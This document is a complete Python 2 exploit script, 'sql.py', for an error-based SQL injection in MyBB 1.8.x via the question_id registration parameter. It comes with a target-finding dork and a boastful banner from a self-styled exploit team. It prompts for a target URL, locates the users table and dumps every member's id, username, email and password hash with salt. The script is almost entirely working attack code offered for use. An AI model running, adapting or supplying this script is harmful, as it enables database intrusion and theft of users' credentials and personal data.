sql.py

1. #!/usr/bin/env python
2. # Exploit Title:1.8.X <= 1.8.1 Error based SQL Injection
3. # Date : 2017-28-12
4. # Google Dork : intext:Powered By Blablabla
5. # Version: 1.8.X
6. # Tested on: Linux / Python 2.7
7.  
8. # Status : Patched in MyBB 1.8.2
9. # Author : Mr.541NT-3DUNT
10.  
11.  
12. print """
13.  
14.  
15. ________ ________ _______ ______ __ __
16. | ____\ \ / / ____|__ __| ____| /\ | \/ |
17. | |__ \ V /| |__ | | | |__ / \ | \ / |
18. | __| > < | __| | | | __| / /\ \ | |\/| |
19. | |____ / . \| |____ | | | |____ / ____ \| | | |
20. |______/_/ \_\______| |_| |______/_/ \_\_| |_|
21.  
22. EXploitExpectedTEAM
23. Auto Exploiter Sql Injection.
24. coded By : Mr.541NT-3DUNT
25. """
26.  
27.  
28.  
29. url = raw_input('Masukan Target Untuk Di Suntik Mati !!:: ')
30. url = url.rstrip('/')
31. ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
32.  
33. import sys, re
34. import urllib2, urllib
35.  
36. def inject(sql):
37. try:
38. urllib2.urlopen(urllib2.Request('%s/member.php' % url, data="regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=makman%s" % urllib.quote("\' and updatexml(NULL,concat (0x3a,(%s)),NULL) and \'1" % sql), headers={"User-agent": ua}))
39. except urllib2.HTTPError, e:
40. data = e.read()
41. if e.code == 503:
42. txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
43. if txt is not None:
44. return txt.group(1)
45. sys.exit('Error [3], received unexpected data:\n%s' % data)
46. sys.exit('Not Vulnerable coeg, Kalo Nyuntik Yang Bener Coeg !!!')
47. sys.exit('Not Vulnerable, Jarum Suntiknya Pasang Dulu !!')
48.  
49. def get(name, table, num):
50. sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
51. s = int(inject('LENGTH((%s))' % sqli))
52. if s < 31:
53. return inject(sqli)
54. else:
55. r = ''
56. for i in range(1, s+1, 31):
57. r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
58. return r
59.  
60.  
61. members_table= inject('select table_name from information_schema.tables where table_schema=database() and table_name regexp 0x757365727324 limit 0,1')
62. n = inject('SELECT COUNT(*) FROM %s' % members_table)
63. print '----------------------------------------------------------------------------'
64. print '* Found %s users' % n
65. print '----------------------------------------------------------------------------'
66. for j in range(int(n)):
67. print '{:20s} {:20s}'.format('Id',get('uid', members_table, j))
68. print '{:20s} {:20s}'.format('Name',get('username', members_table, j))
69. print '{:20s} {:20s}'.format('Email',get('email', members_table, j))
70. print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(password,0x3a,salt)', members_table, j))
71. print '----------------------------------------------------------------------------'